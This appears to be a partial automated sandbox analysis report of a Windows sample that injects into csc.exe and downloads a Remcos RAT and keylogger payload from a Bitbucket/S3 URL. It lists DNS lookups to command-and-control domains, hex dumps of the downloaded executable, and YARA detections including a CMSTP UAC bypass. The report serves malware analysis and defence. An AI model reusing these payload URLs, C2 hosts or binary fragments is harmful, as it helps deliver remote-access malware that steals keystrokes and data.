Dec 12, 2024 17:35:35.871200085 CET	192.168.2.8	1.1.1.1	0xaa14	Standard query (0)	navegacionseguracol24vip.org	A (IP address)	IN (0x0001)	false
Dec 12, 2024 17:35:37.964526892 CET	192.168.2.8	1.1.1.1	0x943b	Standard query (0)	bitbucket.org	A (IP address)	IN (0x0001)	false
Dec 12, 2024 17:35:40.377872944 CET	192.168.2.8	1.1.1.1	0x13f1	Standard query (0)	bbuseruploads.s3.amazonaws.com	A (IP address)	IN (0x0001)	false
Dec 12, 2024 17:36:17.002454042 CET	192.168.2.8	1.1.1.1	0x841	Standard query (0)	newstaticfreepoint24.ddns-ip.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 12, 2024 17:35:36.008094072 CET	1.1.1.1	192.168.2.8	0xaa14	No error (0)	navegacionseguracol24vip.org		181.131.217.244	A (IP address)	IN (0x0001)	false
Dec 12, 2024 17:35:38.102741957 CET	1.1.1.1	192.168.2.8	0x943b	No error (0)	bitbucket.org		185.166.143.49	A (IP address)	IN (0x0001)	false
Dec 12, 2024 17:35:38.102741957 CET	1.1.1.1	192.168.2.8	0x943b	No error (0)	bitbucket.org		185.166.143.50	A (IP address)	IN (0x0001)	false
Dec 12, 2024 17:35:38.102741957 CET	1.1.1.1	192.168.2.8	0x943b	No error (0)	bitbucket.org		185.166.143.48	A (IP address)	IN (0x0001)	false
Dec 12, 2024 17:35:40.602955103 CET	1.1.1.1	192.168.2.8	0x13f1	No error (0)	bbuseruploads.s3.amazonaws.com	s3-1-w.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 12, 2024 17:35:40.602955103 CET	1.1.1.1	192.168.2.8	0x13f1	No error (0)	s3-1-w.amazonaws.com	s3-w.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 12, 2024 17:35:40.602955103 CET	1.1.1.1	192.168.2.8	0x13f1	No error (0)	s3-w.us-east-1.amazonaws.com		3.5.25.23	A (IP address)	IN (0x0001)	false
Dec 12, 2024 17:35:40.602955103 CET	1.1.1.1	192.168.2.8	0x13f1	No error (0)	s3-w.us-east-1.amazonaws.com		3.5.27.19	A (IP address)	IN (0x0001)	false
Dec 12, 2024 17:35:40.602955103 CET	1.1.1.1	192.168.2.8	0x13f1	No error (0)	s3-w.us-east-1.amazonaws.com		16.15.185.112	A (IP address)	IN (0x0001)	false
Dec 12, 2024 17:35:40.602955103 CET	1.1.1.1	192.168.2.8	0x13f1	No error (0)	s3-w.us-east-1.amazonaws.com		3.5.31.192	A (IP address)	IN (0x0001)	false
Dec 12, 2024 17:35:40.602955103 CET	1.1.1.1	192.168.2.8	0x13f1	No error (0)	s3-w.us-east-1.amazonaws.com		52.217.115.1	A (IP address)	IN (0x0001)	false
Dec 12, 2024 17:35:40.602955103 CET	1.1.1.1	192.168.2.8	0x13f1	No error (0)	s3-w.us-east-1.amazonaws.com		52.216.239.91	A (IP address)	IN (0x0001)	false
Dec 12, 2024 17:35:40.602955103 CET	1.1.1.1	192.168.2.8	0x13f1	No error (0)	s3-w.us-east-1.amazonaws.com		52.216.27.140	A (IP address)	IN (0x0001)	false
Dec 12, 2024 17:35:40.602955103 CET	1.1.1.1	192.168.2.8	0x13f1	No error (0)	s3-w.us-east-1.amazonaws.com		52.217.174.9	A (IP address)	IN (0x0001)	false
Dec 12, 2024 17:36:17.338908911 CET	1.1.1.1	192.168.2.8	0x841	No error (0)	newstaticfreepoint24.ddns-ip.net		181.131.217.244	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

bitbucket.org

bbuseruploads.s3.amazonaws.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49707	185.166.143.49	443	3672	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 16:35:39 UTC	101	OUT	GET /facturacioncol/fact/downloads/null.exe HTTP/1.1 Host: bitbucket.org Connection: Keep-Alive
2024-12-12 16:35:40 UTC	5949	IN	HTTP/1.1 302 Found Date: Thu, 12 Dec 2024 16:35:40 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Server: AtlassianEdge Location: https://bbuseruploads.s3.amazonaws.com/986cb0ac-5fcf-4393-afaa-e2b223260ae9/downloads/47e1d263-9601-40cc-a367-13b7035db3ac/null.exe?response-content-disposition=attachment%3B%20filename%3D%22null.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIGUX6ORX&Signature=Zjqmry%2BNGZ5szyFv0hOwnpTu2lo%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAkaCXVzLWVhc3QtMSJIMEYCIQCGK9zub4%2FRHXDXeMN6k7XbjWwi0RJXwId9Ng33n0K%2F8QIhAN1Z2SPiS2gBnFaWWj6eia3uOu6PtMwycvP14HCcOT8YKrACCML%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2IgwcdwWUJNKUMa%2FVym4qhALnixtfvkFlXAR1WJ687dROjrNTrlqec61HZk4xyIIbcd%2BRgXd%2Fh168iQ4%2BTw9BMZ81Zwv1RSJSVyNitKiXJcfIQRolpUMKdiNxfFyyqqcS0Tg2S3lJkWed%2BtKsHpen1E%2FDAnwDyxdvLayliINqWRXGDW9o6tVJBmDEqSXaOt6hqwZ%2FZha79%2Ff8W3BbEbePj2r6gzjnKKD7c1Ovt6LbwVJN%2B9jBhD2fyIBe5Lh3ZNbIVl4daY0oFLDS4VVAIEjburQUN4QSd7FkqlJhmbW3zmDwMI5%2Fb2gCZabQeQoSAb8VczrPcqmysGUiRjzARXLheXFHYDegGiflUK0oIiw2VGfaVRixBDCWnOy6BjqcARFHPbVaro%2BtHveeLvVVaDflun9rRVYAEJEvIZ58bqvNw79lxq2jSq9Ozh3SUPLz%2B6oHkYiGFJsYRa7HJIWuZdD%2FxHsyV%2BkzTZEx49KbjWL [TRUNCATED] Expires: Thu, 12 Dec 2024 16:35:40 GMT Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private X-Used-Mesh: False Vary: Accept-Language, Origin Content-Language: en X-View-Name: bitbucket.apps.downloads.views.download_file X-Dc-Location: Micros-3 X-Served-By: d397ebd10269 X-Version: b7875da02c7c X-Static-Version: b7875da02c7c X-Request-Count: 313 X-Render-Time: 0.08663177490234375 X-B3-Traceid: c75dc2caa5d34804aa6ea30f8973d0f2 X-B3-Spanid: 0dc92b6a64cdb9c3 X-Frame-Options: SAMEORIGIN Content-Security-Policy: connect-src bitbucket.org .bitbucket.org bb-inf.net .bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config- [TRUNCATED] X-Usage-Quota-Remaining: 999010.158 X-Usage-Request-Cost: 1014.87 X-Usage-User-Time: 0.029484 X-Usage-System-Time: 0.000962 X-Usage-Input-Ops: 0 X-Usage-Output-Ops: 0 Age: 0 X-Cache: MISS X-Content-Type-Options: nosniff X-Xss-Protection: 1; mode=block Atl-Traceid: c75dc2caa5d34804aa6ea30f8973d0f2 Atl-Request-Id: c75dc2ca-a5d3-4804-aa6e-a30f8973d0f2 Strict-Transport-Security: max-age=63072000; includeSubDomains; preload Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600} Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"} Server-Timing: atl-edge;dur=198,atl-edge-internal;dur=3,atl-edge-upstream;dur=196,atl-edge-pop;desc="aws-eu-central-1" Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49708	3.5.25.23	443	3672	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 16:35:42 UTC	1187	OUT	GET /986cb0ac-5fcf-4393-afaa-e2b223260ae9/downloads/47e1d263-9601-40cc-a367-13b7035db3ac/null.exe?response-content-disposition=attachment%3B%20filename%3D%22null.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIGUX6ORX&Signature=Zjqmry%2BNGZ5szyFv0hOwnpTu2lo%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAkaCXVzLWVhc3QtMSJIMEYCIQCGK9zub4%2FRHXDXeMN6k7XbjWwi0RJXwId9Ng33n0K%2F8QIhAN1Z2SPiS2gBnFaWWj6eia3uOu6PtMwycvP14HCcOT8YKrACCML%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2IgwcdwWUJNKUMa%2FVym4qhALnixtfvkFlXAR1WJ687dROjrNTrlqec61HZk4xyIIbcd%2BRgXd%2Fh168iQ4%2BTw9BMZ81Zwv1RSJSVyNitKiXJcfIQRolpUMKdiNxfFyyqqcS0Tg2S3lJkWed%2BtKsHpen1E%2FDAnwDyxdvLayliINqWRXGDW9o6tVJBmDEqSXaOt6hqwZ%2FZha79%2Ff8W3BbEbePj2r6gzjnKKD7c1Ovt6LbwVJN%2B9jBhD2fyIBe5Lh3ZNbIVl4daY0oFLDS4VVAIEjburQUN4QSd7FkqlJhmbW3zmDwMI5%2Fb2gCZabQeQoSAb8VczrPcqmysGUiRjzARXLheXFHYDegGiflUK0oIiw2VGfaVRixBDCWnOy6BjqcARFHPbVaro%2BtHveeLvVVaDflun9rRVYAEJEvIZ58bqvNw79lxq2jSq9Ozh3SUPLz%2B6oHkYiGFJsYRa7HJIWuZdD%2FxHsyV%2BkzTZEx49KbjWLKQRpJvFpjW5%2FoA50n0mp2yif%2BnAmClG8k2TFNOko [TRUNCATED] Host: bbuseruploads.s3.amazonaws.com Connection: Keep-Alive
2024-12-12 16:35:42 UTC	570	IN	HTTP/1.1 200 OK x-amz-id-2: kk8/ULGfpme80VJgLOEz2lzixhKF7MkCfvQdVP/w/TG/YJLYGJJu/u8iion4fQ2n9hX2UNxC6xo/xwi/inxlzlksP8gqNGvlC2niJW3hdYo= x-amz-request-id: VPXC4E660VW6XHT7 Date: Thu, 12 Dec 2024 16:35:43 GMT Last-Modified: Thu, 12 Dec 2024 14:47:44 GMT ETag: "27650afe28ba588c759ade95bf403833" x-amz-server-side-encryption: AES256 x-amz-version-id: kXXRZ1mUq75DO3FONi1exQQCVC7lCh3. Content-Disposition: attachment; filename="null.exe" Accept-Ranges: bytes Content-Type: application/x-msdownload Content-Length: 4054528 Server: AmazonS3 Connection: close
2024-12-12 16:35:42 UTC	16384	IN	Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZP@!L!This program must be run under Win32$7
2024-12-12 16:35:42 UTC	454	IN	Data Raw: 77 0f 8d 44 24 04 50 e8 34 c7 ff ff 83 f8 00 74 71 8b 44 24 04 fc e8 c9 f5 ff ff 8b 54 24 08 6a 00 50 68 2e 4c 40 00 52 ff 15 18 c0 61 00 8b 5c 24 04 81 3b de fa ed 0e 8b 53 14 8b 43 18 74 1d 8b 15 10 c0 61 00 85 d2 0f 84 fa fe ff ff 89 d8 ff d2 85 c0 0f 84 ee fe ff ff 8b 53 0c e8 16 fb ff ff 8b 0d 04 c0 61 00 85 c9 74 02 ff d1 8b 4c 24 04 b8 d9 00 00 00 8b 51 14 89 14 24 e9 d6 03 00 00 31 c0 c3 8d 40 00 31 d2 8d 45 f4 64 8b 0a 64 89 02 89 08 c7 40 04 e8 4b 40 00 89 68 08 a3 3c c6 61 00 c3 8d 40 00 31 d2 a1 3c c6 61 00 85 c0 74 1c 64 8b 0a 39 c8 75 08 8b 00 64 89 02 c3 8b 09 83 f9 ff 74 08 39 01 75 f5 8b 00 89 01 c3 55 8b ec 53 56 57 bf 38 c6 61 00 8b 47 08 85 c0 74 48 8b 5f 0c 8b 70 04 33 d2 55 68 16 4d 40 00 64 ff 32 64 89 22 85 db 7e 12 4b 89 5f 0c 8b Data Ascii: wD$P4tqD$T$jPh.L@Ra\$;SCtaSatL$Q$1@1Edd@K@h<a@1<atd9udt9uUSVW8aGtH_p3UhM@d2d"~K_
2024-12-12 16:35:42 UTC	16384	IN	Data Raw: c0 61 00 00 e8 61 ff ff ff c3 53 31 db 57 56 8b 3c 18 8d 74 18 04 8b 46 04 8b 16 01 d8 01 da e8 ea 26 00 00 83 c6 08 4f 75 ec 5e 5f 5b c3 53 31 db 57 56 8b 3c 18 8d 74 18 04 8b 46 04 8b 16 8b 04 18 01 da e8 c5 26 00 00 83 c6 08 4f 75 eb 5e 5f 5b c3 8d 40 00 53 31 db 57 56 8b 3c 18 8d 74 18 04 8b 46 04 8b 16 8b 04 18 03 46 08 89 04 1a 83 c6 0c 4f 75 ec 5e 5f 5b c3 53 56 8b 18 8d 70 04 8b 56 04 8b 06 e8 27 0a 00 00 83 c6 08 4b 75 f0 5e 5b c3 8b c0 53 56 57 be c8 10 61 00 b1 10 8b 1d 00 10 61 00 8b c3 bf 0a 00 00 00 99 f7 ff 80 c2 30 33 c0 8a c1 88 14 06 8b c3 bb 0a 00 00 00 99 f7 fb 8b d8 49 85 db 75 db b1 1c a1 04 10 61 00 8b d0 83 e2 0f 8a 92 e8 10 61 00 33 db 8a d9 88 14 1e c1 e8 04 49 85 c0 75 e6 5f 5e 5b c3 8b c0 31 c0 87 05 00 10 61 00 f7 d8 19 c0 40 Data Ascii: aaS1WV<tF&Ou^_[S1WV<tF&Ou^_[@S1WV<tFFOu^_[SVpV'Ku^[SVWaa03Iuaa3Iu_^[1a@
2024-12-12 16:35:42 UTC	1024	IN	Data Raw: 54 46 69 6c 65 4e 61 6d 65 90 d4 8d 40 00 0e 0a 54 53 65 61 72 63 68 52 65 63 58 01 00 00 01 00 00 00 c0 8d 40 00 0c 00 00 00 3c 8e 40 00 00 00 00 00 00 00 00 00 3c 8e 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 8e 40 00 0c 00 00 00 5c 11 40 00 00 45 40 00 0c 45 40 00 10 45 40 00 14 45 40 00 08 45 40 00 50 42 40 00 6c 42 40 00 a8 42 40 00 0e 00 00 00 00 00 01 00 00 00 08 11 40 00 04 00 00 00 09 45 78 63 65 70 74 69 6f 6e a4 8e 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a4 8e 40 00 0c 00 00 00 f0 8d 40 00 00 45 40 00 0c 45 40 00 10 45 40 00 14 45 40 00 08 45 40 00 50 42 40 00 6c 42 40 00 a8 42 40 00 06 45 41 62 6f 72 74 90 f8 8e 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: TFileName@TSearchRecX@<@<@N@\@E@E@E@E@E@PB@lB@B@@Exception@@@E@E@E@E@E@PB@lB@B@EAbort@
2024-12-12 16:35:42 UTC	16384	IN	Data Raw: 40 00 0c 45 49 6e 74 4f 76 65 72 66 6c 6f 77 8d 40 00 24 92 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 24 92 40 00 10 00 00 00 bc 8f 40 00 00 45 40 00 0c 45 40 00 10 45 40 00 14 45 40 00 08 45 40 00 50 42 40 00 6c 42 40 00 a8 42 40 00 0a 45 4d 61 74 68 45 72 72 6f 72 90 7c 92 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7c 92 40 00 10 00 00 00 d8 91 40 00 00 45 40 00 0c 45 40 00 10 45 40 00 14 45 40 00 08 45 40 00 50 42 40 00 6c 42 40 00 a8 42 40 00 0a 45 49 6e 76 61 6c 69 64 4f 70 90 d4 92 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 92 40 00 10 00 00 00 d8 91 40 00 00 45 40 00 0c 45 40 00 10 45 40 00 14 45 40 00 08 Data Ascii: @EIntOverflow@$@$@@E@E@E@E@E@PB@lB@B@EMathError\|@\|@@E@E@E@E@E@PB@lB@B@EInvalidOp@@@E@E@E@E@
2024-12-12 16:35:42 UTC	1024	IN	Data Raw: ff ff 59 e9 0e 03 00 00 55 e8 a4 f8 ff ff 59 55 e8 01 f9 ff ff 59 83 7d f4 02 7e 07 c7 45 f4 02 00 00 00 8b 45 08 50 0f b7 45 e6 8b 55 f4 e8 33 f8 ff ff 59 e9 dd 02 00 00 55 e8 73 f8 ff ff 59 83 7d f4 01 75 14 8b 45 08 50 a1 a4 c6 61 00 e8 72 fb ff ff 59 e9 bc 02 00 00 8b 45 08 50 a1 a8 c6 61 00 e8 5e fb ff ff 59 e9 a8 02 00 00 55 e8 3e f8 ff ff 59 55 e8 9b f8 ff ff 59 83 7d f4 03 7e 07 c7 45 f4 03 00 00 00 8b 45 08 50 0f b7 45 e4 8b 55 f4 e8 cd f7 ff ff 59 e9 77 02 00 00 55 e8 71 f8 ff ff 59 8b 75 fc 4e ba 1c d5 40 00 b9 05 00 00 00 8b c6 e8 fb dc ff ff 85 c0 75 28 66 83 7d ea 0c 72 03 83 c6 03 8b 45 08 50 ba 02 00 00 00 8b c6 e8 29 f7 ff ff 59 83 45 fc 04 c6 45 e2 01 e9 2f 02 00 00 ba 24 d5 40 00 b9 03 00 00 00 8b c6 e8 be dc ff ff 85 c0 75 28 66 83 7d Data Ascii: YUYUY}~EEPEU3YUsY}uEParYEPa^YU>YUY}~EEPEUYwUqYuN@u(f}rEP)YEE/$@u(f}
2024-12-12 16:35:42 UTC	1749	IN	Data Raw: ff ff 5d c2 08 00 55 8b ec ff 75 0c ff 75 08 33 d2 e8 64 ff ff ff 5d c2 08 00 55 8b ec ff 75 0c ff 75 08 92 e8 51 ff ff ff 5d c2 08 00 90 53 56 57 8b fa 8b f0 8b 1f eb 01 43 8b c6 e8 c1 7d ff ff 3b d8 7f 07 80 7c 1e ff 20 74 ed 89 1f 5f 5e 5b c3 55 8b ec 83 c4 f4 53 56 57 89 4d f8 89 55 fc 8b f8 c6 45 f7 00 8b 45 08 c6 00 00 8b 55 fc 8b c7 e8 b7 ff ff ff 8b 5d fc 8b 1b 33 f6 eb 17 8b c6 03 c0 8d 04 80 33 d2 8a 54 1f ff 66 83 ea 30 66 03 c2 8b f0 43 8b c7 e8 64 7d ff ff 3b d8 7f 11 8a 44 1f ff 04 d0 2c 0a 73 07 66 81 fe e8 03 72 cd 8b 45 fc 3b 18 7e 1d 8b c3 8b 55 fc 8b 12 2a c2 8b 55 08 88 02 8b 45 fc 89 18 8b 45 f8 66 89 30 c6 45 f7 01 8a 45 f7 5f 5e 5b 8b e5 5d c2 04 00 8d 40 00 55 8b ec 83 c4 f8 53 56 57 33 db 89 5d f8 8b f9 8b f2 89 45 fc 33 c0 55 68 Data Ascii: ]Uuu3d]UuuQ]SVWC};\| t_^[USVWMUEEU]33Tf0fCd};D,sfrE;~U*UEEf0EE_^[]@USVW3]E3Uh
2024-12-12 16:35:42 UTC	9000	IN	Data Raw: d6 8a 0d 98 c6 61 00 8b c5 e8 8f fa ff ff 84 c0 74 74 8d 44 24 0c 50 8d 4c 24 0a 8b d6 8b c5 e8 59 f9 ff ff 84 c0 0f 84 03 01 00 00 8b d6 8a 0d 98 c6 61 00 8b c5 e8 62 fa ff ff 84 c0 74 47 8d 44 24 0c 50 8d 4c 24 0c 8b d6 8b c5 e8 2c f9 ff ff 84 c0 0f 84 d6 00 00 00 8b d6 8a 0d 8b c6 61 00 8b c5 e8 35 fa ff ff 84 c0 74 1a 8d 44 24 0c 50 8d 4c 24 0e 8b d6 8b c5 e8 ff f8 ff ff 84 c0 0f 84 a9 00 00 00 85 ff 7d 53 8b d6 8b 0d 9c c6 61 00 8b c5 e8 78 f9 ff ff 84 c0 75 12 8b d6 b9 dc dd 40 00 8b c5 e8 66 f9 ff ff 84 c0 74 04 33 ff eb 2a 8b d6 8b 0d a0 c6 61 00 8b c5 e8 4f f9 ff ff 84 c0 75 12 8b d6 b9 e8 dd 40 00 8b c5 e8 3d f9 ff ff 84 c0 74 05 bf 0c 00 00 00 85 ff 7c 24 66 83 7c 24 04 00 74 46 66 83 7c 24 04 0c 77 3e 66 83 7c 24 04 0c 75 07 66 c7 44 24 04 00 Data Ascii: attD$PL$YabtGD$PL$,a5tD$PL$}Saxu@ft3*aOu@=t\|$f\|$tFf\|$w>f\|$ufD$
2024-12-12 16:35:43 UTC	16384	IN	Data Raw: 04 85 db 75 f3 5b c3 8b c0 53 bb 68 13 61 00 eb 10 8b 03 8b 10 89 13 ba 08 00 00 00 e8 64 28 ff ff 83 3b 00 75 eb 5b c3 90 53 68 24 00 41 00 e8 3d 7c ff ff 8b d8 85 db 74 10 68 34 00 41 00 53 e8 3c 7c ff ff a3 8c 11 61 00 83 3d 8c 11 61 00 00 75 0a b8 14 ad 40 00 a3 8c 11 61 00 5b c3 00 00 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 00 00 00 00 47 65 74 44 69 73 6b 46 72 65 65 53 70 61 63 65 45 78 41 00 ba 01 00 00 00 92 f0 0f c1 02 40 c3 ba ff ff ff ff 92 f0 0f c1 02 48 c3 87 10 89 d0 c3 8d 40 00 92 f0 0f c1 02 c3 8b c0 53 56 57 55 e8 0b 46 ff ff 8b da 8b f8 33 f6 8b 6c b7 04 33 c0 89 44 b7 04 85 ed 74 0e 8b c5 8b 6d 00 e8 b1 27 ff ff 85 ed 75 f2 46 83 fe 10 75 de 8b d3 80 e2 fc 8b c7 e8 fb 41 ff ff 84 db 7e 07 8b c7 e8 b4 45 ff ff 5d 5f 5e 5b c3 8d 40 00 55 8b Data Ascii: u[Shad(;u[Sh$A=\|th4AS<\|a=au@a[kernel32.dllGetDiskFreeSpaceExA@H@SVWUF3l3Dtm'uFuA~E]_^[@U
2024-12-12 16:35:43 UTC	1024	IN	Data Raw: 00 0f 95 04 24 e9 8d 02 00 00 d9 43 08 d8 1d 60 42 41 00 df e0 9e 0f 95 04 24 e9 78 02 00 00 dd 43 08 d8 1d 60 42 41 00 df e0 9e 0f 95 04 24 e9 63 02 00 00 df 6b 08 d8 1d 60 42 41 00 df e0 9e 0f 95 04 24 e9 4e 02 00 00 dd 43 08 d8 1d 60 42 41 00 df e0 9e 0f 95 04 24 e9 39 02 00 00 8b c3 e8 3c fd ff ff 88 04 24 e9 2a 02 00 00 66 83 7b 08 01 1b c0 40 88 04 24 e9 1a 02 00 00 80 7b 08 00 0f 95 04 24 e9 0d 02 00 00 80 7b 08 00 0f 95 04 24 e9 00 02 00 00 66 83 7b 08 00 0f 95 04 24 e9 f2 01 00 00 83 7b 08 00 0f 95 04 24 e9 e5 01 00 00 83 7b 0c 00 75 04 83 7b 08 00 0f 95 c0 88 04 24 e9 d0 01 00 00 8b 43 08 e8 8a fe ff ff 88 04 24 e9 c0 01 00 00 8b c3 e8 8b fd ff ff 88 04 24 e9 b1 01 00 00 8b d0 66 81 ea 00 01 74 07 66 ff ca 74 11 eb 1e 8b c3 e8 a4 fc ff ff 88 04 Data Ascii: $C`BA$xC`BA$ck`BA$NC`BA$9<$*f{@${${$f{${${u{$C$$ftft

Target ID:	0
Start time:	11:35:11
Start date:	12/12/2024
Path:	C:\Users\user\Desktop\hCJ8gK9kNn.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\hCJ8gK9kNn.exe"
Imagebase:	0x400000
File size:	3'136'512 bytes
MD5 hash:	F66BC0E967E3399863A99E9BD302AC73
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Target ID:	3
Start time:	11:35:31
Start date:	12/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Imagebase:	0x370000
File size:	2'141'552 bytes
MD5 hash:	EB80BB1CA9B9C7F516FF69AFCFD75B7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.3318680786.0000000007E62000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.3319366859.00000000094B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.3317409163.0000000006CC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000003.00000003.1875083635.0000000008333000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Target ID:	6
Start time:	11:35:54
Start date:	12/12/2024
Path:	C:\Users\user\AppData\Local\Temp\dyfwtd.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\dyfwtd.exe
Imagebase:	0x400000
File size:	4'054'528 bytes
MD5 hash:	27650AFE28BA588C759ADE95BF403833
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000006.00000002.2147653043.0000000013450000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.2147653043.0000000013450000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000002.2147653043.0000000013450000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000006.00000002.2147653043.0000000013450000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000006.00000002.2147653043.0000000013450000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000006.00000002.2147653043.0000000013450000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000006.00000002.2147341971.0000000005AB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.2147341971.0000000005AB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000002.2147341971.0000000005AB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000006.00000002.2147341971.0000000005AB0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000006.00000002.2147341971.0000000005AB0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000006.00000002.2147341971.0000000005AB0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000006.00000002.2147868994.00000000134D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 